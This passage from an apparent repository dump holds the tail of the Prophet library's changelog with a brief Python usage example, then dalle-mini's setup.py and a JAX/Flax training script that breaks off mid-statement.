- Added two methods to the `Prophet` object: `preprocess()` and `calculate_initial_params()`. These do not need to be called and will not change the model fitting process. Their purpose is to provide clarity on the pre-processing steps taken (`y` scaling, creating fourier series, regressor scaling, setting changepoints, etc.) before the data is passed to the stan model. - Added argument `extra_output_columns` to `cross_validation()`. The user can specify additional columns from `predict()` to include in the final output alongside `ds` and `yhat`, for example `extra_output_columns=['trend']`. - prophet's custom `hdays` module was deprecated last version and is now removed. #### R - Updated `holidays` data based on holidays version 0.34. ### Version 1.1.4 (2023.05.30) #### Python - We now rely solely on `holidays` package for country holidays. - Upgraded cmdstan version to 2.31.0, enabling Apple M1 support. - Fixed bug with Windows installation caused by long paths. #### R - Updated `holidays` data based on holidays version 0.25. ### Version 1.1.2 (2023.01.20) #### Python - Sped up `.predict()` by up to 10x by removing intermediate DataFrame creations. - Sped up fourier series generation, leading to at least 1.5x speed improvement for `train()` and `predict()` pipelines. - Fixed bug in how warm start values were being read. - Wheels are now version-agnostic. #### R - Fixed a bug in `construct_holiday_dataframe()` - Updated `holidays` data based on holidays version 0.18. ### Version 1.1.1 (2022.09.08) - (Python) Improved runtime (3-7x) of uncertainty predictions via vectorization. - Bugfixes relating to Python package versions and R holiday objects. ### Version 1.1 (2022.06.25) - Replaced `pystan2` dependency with `cmdstan` + `cmdstanpy`. - Pre-packaged model binaries for Python package, uploaded binary distributions to PyPI. - Improvements in the `stan` model code, cross-validation metric calculations, holidays. ### Version 1.0 (2021.03.28) - Python package name changed from fbprophet to prophet - Fixed R Windows build issues to get latest version back on CRAN - Improvements in serialization, holidays, and R timezone handling - Plotting improvements ### Version 0.7 (2020.09.05) - Built-in json serialization - Added "flat" growth option - Bugfixes related to `holidays` and `pandas` - Plotting improvements - Improvements in cross validation, such as parallelization and directly specifying cutoffs ### Version 0.6 (2020.03.03) - Fix bugs related to upstream changes in `holidays` and `pandas` packages. 
- Compile model during first use, not during install (to comply with CRAN policy)
- `cmdstanpy` backend now available in Python
- Python 2 no longer supported

### Version 0.5 (2019.05.14)

- Conditional seasonalities
- Improved cross validation estimates
- Plotly plot in Python
- Bugfixes

### Version 0.4 (2018.12.18)

- Added holidays functionality
- Bugfixes

### Version 0.3 (2018.06.01)

- Multiplicative seasonality
- Cross validation error metrics and visualizations
- Parameter to set range of potential changepoints
- Unified Stan model for both trend types
- Improved future trend uncertainty for sub-daily data
- Bugfixes

### Version 0.2.1 (2017.11.08)

- Bugfixes

### Version 0.2 (2017.09.02)

- Forecasting with sub-daily data
- Daily seasonality, and custom seasonalities
- Extra regressors
- Access to posterior predictive samples
- Cross-validation function
- Saturating minimums
- Bugfixes

### Version 0.1.1 (2017.04.17)

- Bugfixes
- New options for detecting yearly and weekly seasonality (now the default)

### Version 0.1 (2017.02.23)

- Initial release

## License

Prophet is licensed under the [MIT license](LICENSE).
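The installation sections and the v1.1.x changelog entries above mention the Python quick start, the `scaling` and `holidays_mode` constructor arguments, and the `extra_output_columns` option of `cross_validation()`. The snippet below is a minimal, illustrative sketch of how those pieces fit together; the CSV filename and the cross-validation windows are placeholders, and the input dataframe is assumed to follow the usual `ds`/`y` schema.

```python
import pandas as pd
from prophet import Prophet
from prophet.diagnostics import cross_validation

# Placeholder file: any dataframe with a `ds` date column and a `y` value column works.
df = pd.read_csv("example_timeseries.csv")

# `scaling` and `holidays_mode` were added in v1.1.5 (see changelog above); the defaults
# ('absmax', and the value of seasonality_mode) preserve the behaviour of older versions.
m = Prophet(scaling="minmax", holidays_mode="additive")
m.fit(df)

future = m.make_future_dataframe(periods=30)
forecast = m.predict(future)
print(forecast[["ds", "yhat", "yhat_lower", "yhat_upper"]].tail())

# `extra_output_columns` (also v1.1.5) carries additional predict() columns, such as the
# trend, into the cross-validation output alongside `ds` and `yhat`.
df_cv = cross_validation(
    m,
    initial="365 days",
    period="90 days",
    horizon="30 days",
    extra_output_columns=["trend"],
)
```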
dalle-mini
f0be4de610285a002052024a1e096126f9452cc4
File: setup.py from setuptools import setup if __name__ == "__main__": setup() File: tools/train/train.py #!/usr/bin/env python # coding=utf-8 # Copyright 2021-2022 The HuggingFace & DALL·E Mini team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """ Training DALL·E Mini. Script adapted from run_summarization_flax.py """ import io import logging import os import sys import tempfile import time from dataclasses import asdict, dataclass, field from functools import partial from pathlib import Path from typing import Any, Callable, NamedTuple, Optional import datasets import flax import jax import jax.numpy as jnp import jaxlib import numpy as np import optax import transformers import wandb from datasets import Dataset from flax import core, struct, traverse_util from flax.core.frozen_dict import FrozenDict, freeze, unfreeze from flax.serialization import from_bytes, to_bytes from flax.training.common_utils import onehot from jax.experimental import PartitionSpec, maps from jax.experimental.compilation_cache import compilation_cache as cc from jax.experimental.pjit import pjit, with_sharding_constraint from scalable_shampoo.distributed_shampoo import GraftingType, distributed_shampoo from tqdm import tqdm from transformers import HfArgumentParser import dalle_mini from dalle_mini.data import Dataset from dalle_mini.model import ( DalleBart, DalleBartConfig, DalleBartTokenizer, set_partitions, ) try: from google.cloud import storage except: storage = None logger = logging.getLogger(__name__) cc.initialize_cache("jax_cache") @dataclass class ModelArguments: """ Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch. """ model_name_or_path: Optional[str] = field( default=None, metadata={ "help": "The model checkpoint for weights initialization. " "Don't set if you want to train a model from scratch. " "W&B artifact references are supported in addition to the sources supported by `PreTrainedModel`." }, ) config_name: Optional[str] = field( default=None, metadata={ "help": "Pretrained config name or path if not the same as model_name_or_path" }, ) tokenizer_name: Optional[str] = field( default=None, metadata={ "help": "Pretrained tokenizer name or path if not the same as model_name_or_path" }, ) dtype: Optional[str] = field( default="float32", metadata={ "help": "Floating-point format in which the computations will be performed (not the model weights). Choose one of `[float32, float16, bfloat16]`." }, ) restore_state: Optional[bool] = field( default=False, metadata={ "help": "Restore optimizer and training state. Can be True (will retrieve associated wandb artifact), a local directory or a Google bucket path." }, ) dropout: Optional[float] = field( default=None, metadata={"help": "Dropout rate. Overwrites config."}, ) activation_dropout: Optional[float] = field( default=None, metadata={"help": "Activation dropout rate. Overwrites config."}, ) attention_dropout: Optional[float] = field( default=None, metadata={"help": "Attention dropout rate. 
Overwrites config."}, ) def __post_init__(self): if self.tokenizer_name is None: self.tokenizer_name = self.model_name_or_path assert ( self.tokenizer_name is not None ), "Tokenizer name or model name/path needs to be specified" if self.restore_state: assert self.model_name_or_path is not None and ( "/model-" in self.model_name_or_path ), "Restoring state only available with W&B artifact reference" def get_metadata(self): if self.model_name_or_path is not None and ":" in self.model_name_or_path: if jax.process_index() == 0: artifact = wandb.run.use_artifact(self.model_name_or_path) else: artifact = wandb.Api().artifact(self.model_name_or_path) return artifact.metadata else: return dict() def get_opt_state(self): with tempfile.TemporaryDirectory() as tmp_dir: # avoid multiple artifact copies if self.restore_state is True: # wandb artifact state_artifact = self.model_name_or_path.replace( "/model-", "/state-", 1 ) if jax.process_index() == 0: artifact = wandb.run.use_artifact(state_artifact) else: artifact = wandb.Api().artifact(state_artifact) if artifact.metadata.get("bucket_path"): # we will read directly file contents self.restore_state = artifact.metadata["bucket_path"] else: artifact_dir = artifact.download(tmp_dir) self.restore_state = str(Path(artifact_dir) / "opt_state.msgpack") if self.restore_state.startswith("gs://"): bucket_path = Path(self.restore_state[5:]) / "opt_state.msgpack" bucket, blob_name = str(bucket_path).split("/", 1) assert ( storage is not None ), 'Could not find google.storage. Install with "pip install google-cloud-storage"' client = storage.Client() bucket = client.bucket(bucket) blob = bucket.blob(blob_name) return blob.download_as_bytes() with Path(self.restore_state).open("rb") as f: return f.read() @dataclass class DataTrainingArguments: """ Arguments pertaining to what data we are going to input our model for training and eval. """ text_column: Optional[str] = field( default="caption", metadata={ "help": "The name of the column in the datasets containing the full texts (for summarization)." }, ) encoding_column: Optional[str] = field( default="encoding", metadata={ "help": "The name of the column in the datasets containing the image encodings." }, ) dataset_repo_or_path: str = field( default=None, metadata={"help": "The dataset repository containing encoded files."}, ) train_file: Optional[str] = field( default=None, metadata={ "help": "The input training data file (glob & braceexpand acceptable)." }, ) validation_file: Optional[str] = field( default=None, metadata={ "help": "An optional input evaluation data file (glob & braceexpand acceptable)." }, ) # data loading should not be a bottleneck so we use "streaming" mode by default streaming: Optional[bool] = field( default=True, metadata={"help": "Whether to stream the dataset."}, ) use_auth_token: Optional[bool] = field( default=False, metadata={ "help": "Whether to use the authentication token for private datasets." }, ) shard_by_host: Optional[bool] = field( default=False, metadata={ "help": "Whether to shard data files by host in multi-host environments." }, ) blank_caption_prob: Optional[float] = field( default=0.0, metadata={ "help": "Probability of removing some captions for classifier-free guidance." 
}, ) clip_score_column: Optional[str] = field( default="clip_score", metadata={"help": "Column that containts clip score for filtering."}, ) min_clip_score: Optional[float] = field( default=None, metadata={"help": "Minimum clip score required."}, ) max_clip_score: Optional[float] = field( default=None, metadata={"help": "Maximum clip score required."}, ) filter_column: Optional[str] = field( default=None, metadata={"help": "Column that containts classes to be filtered."}, ) filter_value: Optional[str] = field( default=None, metadata={"help": "Class value to be kept during filtering."}, ) multi_eval_ds: Optional[bool] = field( default=False, metadata={ "help": "Whether to look for multiple validation datasets (local support only)." }, ) max_train_samples: Optional[int] = field( default=None, metadata={ "help": "For debugging purposes or quicker training, truncate the number of training examples." }, ) max_eval_samples: Optional[int] = field( default=None, metadata={ "help": "For debugging purposes or quicker training, truncate the number of evaluation examples." }, ) preprocessing_num_workers: Optional[int] = field( default=None, metadata={ "help": "The number of processes to use for the preprocessing. Not used in streaming mode." }, ) overwrite_cache: bool = field( default=False, metadata={ "help": "Overwrite the cached training and evaluation sets. Not used in streaming mode." }, ) # default seed of None ensures we don't repeat the same items if script was interrupted during an epoch seed_dataset: int = field( default=None, metadata={ "help": "Random seed for the dataset that will be set at the beginning of training." }, ) def __post_init__(self): if self.dataset_repo_or_path is None: raise ValueError("Need a dataset repository or path.") @dataclass class TrainingArguments: """ Arguments pertaining to training parameters. """ output_dir: str = field( metadata={ "help": "The output directory where the model predictions and checkpoints will be written." }, ) overwrite_output_dir: bool = field( default=False, metadata={ "help": ( "Overwrite the content of the output directory. " "Use this to continue training if output_dir points to a checkpoint directory." ) }, ) do_train: bool = field(default=False, metadata={"help": "Whether to run training."}) do_eval: bool = field( default=False, metadata={"help": "Whether to run eval on the validation set."} ) per_device_train_batch_size: int = field( default=8, metadata={"help": "Batch size per data parallel device for training."}, ) per_device_eval_batch_size: Optional[int] = field( default=None, metadata={ "help": "Batch size per data parallel device for evaluation. Same as training batch size if not set." }, ) gradient_accumulation_steps: int = field( default=1, metadata={ "help": "Number of updates steps to accumulate before performing an update pass." }, ) gradient_checkpointing: bool = field( default=False, metadata={"help": "Use gradient checkpointing."} ) learning_rate: float = field( default=5e-5, metadata={"help": "The initial learning rate."} ) optim: str = field( default="distributed_shampoo", metadata={ "help": 'The optimizer to use. 
Can be "distributed_shampoo" (default), "adam" or "adafactor"' }, ) weight_decay: float = field( default=0.0, metadata={"help": "Weight decay applied to parameters."} ) beta1: float = field( default=0.9, metadata={"help": "Beta1 for Adam & Distributed Shampoo."}, ) beta2: float = field( default=0.999, metadata={"help": "Beta2 for for Adam & Distributed Shampoo."}, ) adam_epsilon: float = field( default=1e-8, metadata={"help": "Epsilon for AdamW optimizer."} ) max_grad_norm: float = field( default=1.0, metadata={"help": "Max gradient norm for Adafactor."} ) block_size: int = field( default=1024, metadata={"help": "Chunked size for large layers with Distributed Shampoo."}, ) preconditioning_compute_steps: int = field( default=10, metadata={"help": "Number of steps to update preconditioner."} ) skip_preconditioning_dim_size_gt: int = field( default=4096, metadata={"help": "Max size for preconditioning with Distributed Shampoo."}, ) graft_type: str = field( default="rmsprop_normalized", metadata={ "help": "The type of grafting to use. Can be 'rmsprop_normalized' (default), 'rmsprop', 'adagrad', 'adagrad_normalized', 'sgd' or 'sqrt_n'" }, ) nesterov: bool = field( default=False, metadata={"help": "Use Nesterov momentum for Distributed Shampoo."}, ) optim_quantized: bool = field( default=False, metadata={ "help": "Whether to quantize optimizer (only supported with Distributed Shampoo)." }, ) shard_shampoo_across: str = field( default="dp", metadata={ "help": "Whether to shard the optimizer across data devices (dp), model devices (mp) or both (2d)." }, ) num_train_epochs: int = field( default=3, metadata={"help": "Total number of training epochs to perform."} ) warmup_steps: int = field( default=0, metadata={"help": "Linear warmup over warmup_steps."} ) lr_decay: str = field( default=None, metadata={ "help": "Decay to be used in the learning rate scheduler. Can be None (default), linear or exponential." }, ) lr_transition_steps: int = field( default=None, metadata={ "help": "Number of transition steps associated with learning rate decay when using exponential decay." }, ) lr_decay_rate: float = field( default=None, metadata={ "help": "Decay rate associated with learning rate when using exponential decay." }, ) lr_staircase: bool = field( default=False, metadata={ "help": "Whether to use staircase or continuous learning rate when using exponential decay." }, ) lr_offset: int = field( default=0, metadata={"help": "Number of steps to offset learning rate and keep it at 0."}, ) logging_steps: int = field( default=40, metadata={"help": "Log every X updates steps."} ) eval_steps: int = field( default=400, metadata={"help": "Run an evaluation every X steps."} ) save_steps: int = field( default=4000, metadata={"help": "Save checkpoint every X updates steps."} ) log_model: bool = field( default=False, metadata={"help": "Log model to wandb at `save_steps` frequency."}, ) log_norm_steps: int = field( default=True, metadata={"help": "Log parameters and gradients norm at this frequency."}, ) log_histogram_steps: int = field( default=False, metadata={ "help": "Log parameters and gradients histograms at this frequency. Slows down training." }, ) seed_model: int = field( default=42, metadata={ "help": "Random seed for the model that will be set at the beginning of training." 
}, ) embeddings_only: bool = field( default=False, metadata={"help": "Train only embedding layers."} ) init_embeddings: bool = field( default=False, metadata={"help": "When training embedding layers, initialize them."}, ) wandb_entity: Optional[str] = field( default=None, metadata={"help": "The wandb entity to use (for teams)."}, ) wandb_project: str = field( default="dalle-mini", metadata={"help": "The name of the wandb project."}, ) wandb_job_type: str = field( default="Seq2Seq", metadata={"help": "The name of the wandb job type."}, ) assert_TPU_available: bool = field( default=False, metadata={"help": "Verify that TPU is not in use."}, ) use_vmap_trick: bool = field( default=True, metadata={"help": "Verify that TPU is not in use."}, ) mp_devices: Optional[int] = field( default=1, metadata={ "help": "Number of devices required for model parallelism. The other dimension of available devices is used for data parallelism." }, ) dp_devices: int = field(init=False) def __post_init__(self): if self.assert_TPU_available: assert ( jax.local_device_count() == 8 ), "TPUs in use, please check running processes" if self.output_dir.startswith("gs://"): assert ( storage is not None ), 'Could not find google.storage. Install with "pip install google-cloud-storage"' assert self.optim in [ "distributed_shampoo", "adam", "adafactor", ], f"Selected optimizer not supported: {self.optim}" if self.optim == "adafactor" and self.weight_decay == 0: self.weight_decay = None assert self.graft_type in [ "rmsprop_normalized", "rmsprop", "adagrad", "adagrad_normalized", "sgd", "sqrt_n", ], f"Selected graft type not supported: {self.graft_type}" assert self.lr_decay in [ None, "linear", "exponential", ], f"Selected learning rate decay not supported: {self.lr_decay}" if self.per_device_eval_batch_size is None: self.per_device_eval_batch_size = self.per_device_train_batch_size if self.log_norm_steps is True: self.log_norm_steps = self.logging_steps if not self.do_train: self.num_train_epochs = 1 if ( os.path.exists(self.output_dir) and os.listdir(self.output_dir) and self.do_train and not self.overwrite_output_dir ): raise ValueError( f"Output directory ({self.output_dir}) already exists and is not empty." "Use --overwrite_output_dir to overcome." ) assert self.shard_shampoo_across in [ "dp", "mp", "2d", ], f"Shard shampoo across {self.shard_shampoo_across} not supported." assert ( self.mp_devices > 0 ), f"Number of devices for model parallelism must be > 0" assert ( jax.device_count() % self.mp_devices == 0 ), f"Number of available devices ({jax.device_count()} must be divisible by number of devices used for model parallelism ({self.mp_devices})." 
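        # The data-parallel axis is whatever remains after reserving `mp_devices` per model
        # replica (e.g. 8 devices with mp_devices=2 gives dp_devices=4); these two sizes later
        # form the ("dp", "mp") device mesh used by pjit.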
self.dp_devices = jax.device_count() // self.mp_devices def split_params(data): """Split params between scanned and non-scanned""" flat = traverse_util.flatten_dict(unfreeze(data)) split = {"standard": {}, "scanned_encoder": {}, "scanned_decoder": {}} for k, v in flat.items(): if "FlaxBartEncoderLayers" in k: split["scanned_encoder"][k] = v elif "FlaxBartDecoderLayers" in k: split["scanned_decoder"][k] = v else: split["standard"][k] = v # remove empty keys split = {k: v for k, v in split.items() if v} for k, v in split.items(): split[k] = freeze(traverse_util.unflatten_dict(v)) return split def unsplit_params(data): flat = {} for k in ["standard", "scanned_encoder", "scanned_decoder"]: if k in data: flat.update(traverse_util.flatten_dict(unfreeze(data[k]))) return freeze(traverse_util.unflatten_dict(flat)) def trainable_params(data, embeddings_only): """Keep only trainable parameters""" if not embeddings_only: return data data = unfreeze(data) trainable = { "lm_head": data["lm_head"], "model": { "decoder": { layer: data["model"]["decoder"][layer] for layer in [ "embed_positions", "embed_tokens", "final_ln", "layernorm_embedding", ] } }, } return freeze(trainable) def init_embeddings(model, params): """Reinitialize trainable embeddings""" # Must match params in trainable_params() above trainable_keypaths = [ "lm_head.kernel", "model.decoder.embed_positions.embedding", "model.decoder.embed_tokens.embedding", "model.decoder.final_ln.bias", "model.decoder.layernorm_embedding.bias", "model.decoder.layernorm_embedding.scale", ] # Note: using private _missing_keys init_keys = {tuple(k.split(".")) for k in trainable_keypaths} model._missing_keys = init_keys return model.init_weights(model.key, model.input_shape, params=params) def main(): # See all possible arguments by passing the --help flag to this script. parser = HfArgumentParser( (ModelArguments, DataTrainingArguments, TrainingArguments) ) if len(sys.argv) == 2 and sys.argv[1].endswith(".json"): # If we pass only one argument to the script and it's the path to a json file, # let's parse it to get our arguments. model_args, data_args, training_args = parser.parse_json_file( json_file=os.path.abspath(sys.argv[1]) ) else: model_args, data_args, training_args = parser.parse_args_into_dataclasses() # check arguments if training_args.mp_devices > jax.local_device_count(): assert ( data_args.seed_dataset is not None ), "Seed dataset must be provided when model is split over multiple hosts" # Make one log on every process with the configuration for debugging. logging.basicConfig( format="%(asctime)s - %(levelname)s - %(name)s - %(message)s", datefmt="%m/%d/%Y %H:%M:%S", level=logging.INFO, ) # Setup logging, we only want one process per machine to log things on the screen. 
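    # Only the first JAX process keeps INFO-level logging; non-zero processes also downgrade
    # the `datasets` and `transformers` loggers so warnings are not repeated once per host.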
logger.setLevel(logging.INFO if jax.process_index() == 0 else logging.ERROR) if jax.process_index() == 0: datasets.utils.logging.set_verbosity_warning() transformers.utils.logging.set_verbosity_info() else: datasets.utils.logging.set_verbosity_error() transformers.utils.logging.set_verbosity_error() # Set the verbosity to info of the Transformers logger (on main process only): logger.info(f"Training/evaluation parameters {training_args}") # Load dataset dataset = Dataset( **asdict(data_args), do_train=training_args.do_train, do_eval=training_args.do_eval, ) logger.info(f"Local TPUs: {jax.local_device_count()}") logger.info(f"Global TPUs: {jax.device_count()}") # Set up wandb run if jax.process_index() == 0: wandb.init( entity=training_args.wandb_entity, project=training_args.wandb_project, job_type=training_args.wandb_job_type, config=parser.parse_args(), ) # Set up our new model config config_args = { k: getattr(model_args, k) for k in ["dropout", "activation_dropout", "attention_dropout"] if getattr(model_args, k) is not None } config_args["gradient_checkpointing"] = training_args.gradient_checkpointing if model_args.config_name: config = DalleBartConfig.from_pretrained(model_args.config_name) else: config = None # Load or create new model if model_args.model_name_or_path: model, params = DalleBart.from_pretrained( model_args.model_name_or_path, config=config, seed=training_args.seed_model, dtype=getattr(jnp, model_args.dtype), _do_init=False, ) if training_args.embeddings_only and training_args.init_embeddings: params = init_embeddings(model, params) else: model = DalleBart( config, seed=training_args.seed_model, dtype=getattr(jnp, model_args.dtype), _do_init=False, ) params = None for k, v in config_args.items(): setattr(model.config, k, v) params_shape = model.params_shape_tree # get model metadata model_metadata = model_args.get_metadata() # get PartitionSpec for model params (required to be a dict) param_spec = set_partitions(params_shape, model.config.use_scan) params_shape = freeze(params_shape) if params is not None: params = freeze(params) # Load tokenizer tokenizer = DalleBartTokenizer.from_pretrained( model_args.tokenizer_name, use_fast=True ) # Preprocessing the datasets. # We need to normalize and tokenize inputs and targets. 
dataset.preprocess(tokenizer=tokenizer, config=model.config) # Initialize our training dropout_rng = jax.random.PRNGKey(training_args.seed_model) # Store some constant num_epochs = training_args.num_train_epochs # batch size batch_size_per_node_per_grad_step = ( training_args.per_device_train_batch_size * jax.local_device_count() // training_args.mp_devices ) batch_size_per_node = ( batch_size_per_node_per_grad_step * training_args.gradient_accumulation_steps ) batch_size_per_step = batch_size_per_node * jax.process_count() eval_batch_size_per_node = ( training_args.per_device_eval_batch_size * jax.local_device_count() // training_args.mp_devices ) eval_batch_size_per_step = eval_batch_size_per_node * jax.process_count() len_train_dataset, len_eval_dataset = dataset.length steps_per_epoch = ( len_train_dataset // batch_size_per_node if len_train_dataset is not None else None ) num_train_steps = ( steps_per_epoch * num_epochs if steps_per_epoch is not None else None ) num_params = model.num_params(params_shape) logger.info("***** Running training *****") logger.info(f" Num examples = {len_train_dataset}") logger.info(f" Num Epochs = {num_epochs}") logger.info( f" Batch size per dp device = {training_args.per_device_train_batch_size}" ) logger.info(f" Number of devices = {jax.device_count()}") logger.info( f" Gradient accumulation steps = {training_args.gradient_accumulation_steps}" ) logger.info(f" Batch size per update = {batch_size_per_step}") logger.info(f" Model parameters = {num_params:,}") # set up wandb run if jax.process_index() == 0: # set default x-axis as 'train/step' wandb.define_metric("*", step_metric="train/step") # add interesting config parameters wandb.config.update( { "len_train_dataset": len_train_dataset, "len_eval_dataset": len_eval_dataset, "batch_size_per_step": batch_size_per_step, "num_params": num_params, "model_config": model.config.to_dict(), "num_devices": jax.device_count(), "versions": { "jax": jax.__version__, "jaxlib": jaxlib.__version__, "flax": flax.__version__, "transformers": transformers.__version__, "datasets": datasets.__version__, "wandb": wandb.__version__, "dalle_mini": dalle_mini.__version__, }, } ) # Create learning rate schedule def create_learning_rate_fn() -> Callable[[int], jnp.array]: """Create the learning rate function.""" warmup_fn = optax.linear_schedule( init_value=0.0, end_value=training_args.learning_rate, transition_steps=training_args.warmup_steps + 1, # ensure not 0 ) last_boundary = training_args.warmup_steps # offset step when resuming if training_args.lr_offset: warmup_fn = optax.join_schedules( schedules=[optax.constant_schedule(0.0), warmup_fn], boundaries=[training_args.lr_offset], ) last_boundary += training_args.lr_offset if training_args.lr_decay is None: return warmup_fn elif training_args.lr_decay == "linear": assert ( num_train_steps is not None ), "linear decay requires knowing the dataset length" decay_fn = optax.linear_schedule( init_value=training_args.learning_rate, end_value=0, transition_steps=num_train_steps - training_args.warmup_steps, ) elif training_args.lr_decay == "exponential": decay_fn = optax.exponential_decay( init_value=training_args.learning_rate, transition_steps=training_args.lr_transition_steps, decay_rate=training_args.lr_decay_rate, staircase=training_args.lr_staircase, ) schedule_fn = optax.join_schedules( schedules=[warmup_fn, decay_fn], boundaries=[last_boundary], ) return schedule_fn learning_rate_fn = create_learning_rate_fn() # create optimizer trainable_params_shape = trainable_params( 
params_shape, training_args.embeddings_only ) if training_args.optim == "distributed_shampoo": # parameters from https://github.com/tensorflow/lingvo/blob/03ee9d7cd50764b0424c7c863733c91fc0b053ec/lingvo/jax/optimizers.py#L729 graft_type = { "sgd": GraftingType.SGD, "adagrad": GraftingType.ADAGRAD, "rmsprop": GraftingType.RMSPROP, "rmsprop_normalized": GraftingType.RMSPROP_NORMALIZED, "sqrt_n": GraftingType.SQRT_N, "adagrad_normalized": GraftingType.ADAGRAD_NORMALIZED, }[training_args.graft_type] statistics_partition_spec = ( PartitionSpec(None, training_args.shard_shampoo_across, None) if training_args.shard_shampoo_across != "2d" else PartitionSpec(None, "dp", "mp") ) opt = distributed_shampoo( learning_rate_fn, block_size=training_args.block_size, beta1=training_args.beta1, beta2=training_args.beta2, diagonal_epsilon=1e-10, matrix_epsilon=1e-6, weight_decay=training_args.weight_decay, start_preconditioning_step=max( training_args.preconditioning_compute_steps + 1, 101 ), preconditioning_compute_steps=training_args.preconditioning_compute_steps, statistics_compute_steps=1, best_effort_shape_interpretation=True, graft_type=graft_type, nesterov=training_args.nesterov, exponent_override=0, statistics_partition_spec=statistics_partition_spec, preconditioner_partition_spec=PartitionSpec( training_args.shard_shampoo_across, None, None ) if training_args.shard_shampoo_across != "2d" else PartitionSpec( "mp" if training_args.mp_devices > training_args.dp_devices else "dp", None, None, ), num_devices_for_pjit=training_args.dp_devices, shard_optimizer_states=True, inverse_failure_threshold=0.1, moving_average_for_momentum=True, skip_preconditioning_dim_size_gt=training_args.skip_preconditioning_dim_size_gt, clip_by_scaled_gradient_norm=None, precision=jax.lax.Precision.HIGHEST, best_effort_memory_usage_reduction=training_args.optim_quantized, ) # get the real optimizer and helper functions update_fn = opt.update optimizer = {} opt_fn = {} for k, p in split_params(trainable_params_shape).items(): if "scanned" in k: p = jax.eval_shape( lambda x: jax.tree_util.tree_map(lambda y: y[0], x), p ) optimizer[k] = opt.init(p) opt_fn[k] = NamedTuple("opt_fn", pspec_fn=Any, shape_and_dtype_fn=Any)( optimizer[k].pspec_fn, optimizer[k].shape_and_dtype_fn ) optimizer[k] = optax.GradientTransformation(optimizer[k].init_fn, update_fn) elif training_args.optim == "adam": optimizer = optax.adamw( learning_rate=learning_rate_fn, b1=training_args.beta1, b2=training_args.beta2, eps=training_args.adam_epsilon, weight_decay=training_args.weight_decay, ) optimizer = {k: optimizer for k in split_params(trainable_params_shape)} elif training_args.optim == "adafactor": # We use the default parameters here to initialize adafactor, # For more details about the parameters please check https://github.com/deepmind/optax/blob/ed02befef9bf81cbbf236be3d2b0e032e9ed4a40/optax/_src/alias.py#L74 optimizer = optax.adafactor( learning_rate=learning_rate_fn, clipping_threshold=training_args.max_grad_norm, weight_decay_rate=training_args.weight_decay, ) optimizer = {k: optimizer for k in split_params(trainable_params_shape)} # get PartitionSpec for optimizer state def get_opt_state_spec_and_shape(): # get opt_state shape without actual init opt_state_shape = {} for k, p in split_params(trainable_params_shape).items(): if "scanned" not in k: opt_state_shape[k] = jax.eval_shape(optimizer[k].init, p) else: opt_state_shape[k] = jax.eval_shape(jax.vmap(optimizer[k].init), p) if training_args.optim == "adafactor": # factorized state must be 
replicated (rank different than params) opt_state_spec = {k: None for k in split_params(trainable_params_shape)} elif training_args.optim in ["adam", "distributed_shampoo"]: def _opt_state_spec_per_leaf(x, spec): if isinstance(x, FrozenDict): # variables with same structure as params return spec else: # other variables such as count return None split_spec = split_params(set_partitions(trainable_params_shape, False)) opt_state_spec = {} for k, p in split_params(trainable_params_shape).items(): if "scanned" in k: p = jax.eval_shape( lambda x: jax.tree_util.tree_map(lambda y: y[0], x), p ) if training_args.optim == "adam": opt_state_spec[k] = jax.tree_util.tree_map( partial(_opt_state_spec_per_leaf, spec=split_spec[k]), opt_state_shape[k], # return None spec for empty elements is_leaf=lambda x: isinstance(x, (FrozenDict, optax.EmptyState)), ) elif training_args.optim == "distributed_shampoo": opt_state_spec[k] = opt_fn[k].pspec_fn( p, split_spec[k], statistics_partition_spec, ) # add dimension for scanned params if "scanned" in k: opt_state_spec[k] = jax.tree_util.tree_map( lambda x: PartitionSpec(*(None,) + x) if x is not None else None, opt_state_spec[k], is_leaf=lambda x: isinstance(x, PartitionSpec), ) else: raise NotImplementedError return freeze(opt_state_spec), freeze(opt_state_shape) opt_state_spec, opt_state_shape = get_opt_state_spec_and_shape() # create a mesh mesh_shape = (training_args.dp_devices, training_args.mp_devices) devices = np.asarray(jax.devices()).reshape(*mesh_shape) mesh = maps.Mesh(devices, ("dp", "mp")) logger.info(f" Mesh shape: {mesh_shape}") # define TrainState class TrainState(struct.PyTreeNode): step: int params: core.FrozenDict[str, Any] opt_state: optax.OptState apply_fn: Callable = struct.field(pytree_node=False) tx: optax.GradientTransformation = struct.field(pytree_node=False) dropout_rng: jnp.ndarray = None epoch: int = 0 train_time: float = 0.0 # total time the model trained train_samples: int = 0 # number of samples seen def apply_gradients(self, *, grads, **kwargs): grads = split_params(trainable_params(grads, training_args.embeddings_only)) params = split_params( trainable_params(self.params, training_args.embeddings_only) ) opt_state = {} # we loop over keys: "standard", "scanned_encoder", "scanned_decoder" for k, param in params.items(): update_fn = self.tx[k].update if "scanned" in k: update_fn = jax.vmap(update_fn, in_axes=(0, 0, 0), out_axes=(0, 0)) updates, new_opt_state = update_fn(grads[k], self.opt_state[k], param) params[k] = optax.apply_updates(param, updates) opt_state[k] = new_opt_state params = unsplit_params(params) # merge with non-trainable params params, new_params = traverse_util.flatten_dict( unfreeze(self.params) ), traverse_util.flatten_dict(unfreeze(params)) params.update(new_params) params = freeze(traverse_util.unflatten_dict(params)) return self.replace( step=self.step + 1, params=params, opt_state=freeze(opt_state), **kwargs, ) @classmethod def create(cls, *, apply_fn, params, tx, **kwargs): opt_state = {} for k, p in split_params( trainable_params(params, training_args.embeddings_only) ).items(): init_fn = tx[k].init if "scanned" in k: init_fn = jax.vmap(init_fn) opt_state[k] = init_fn(p) return cls( step=0, apply_fn=apply_fn, params=params, tx=tx, opt_state=freeze(opt_state), **kwargs, ) # define state spec state_spec = TrainState( params=param_spec, opt_state=opt_state_spec, dropout_rng=None, step=None, epoch=None, train_time=None, train_samples=None, apply_fn=model.__call__, tx=optimizer, ) # init params if not 
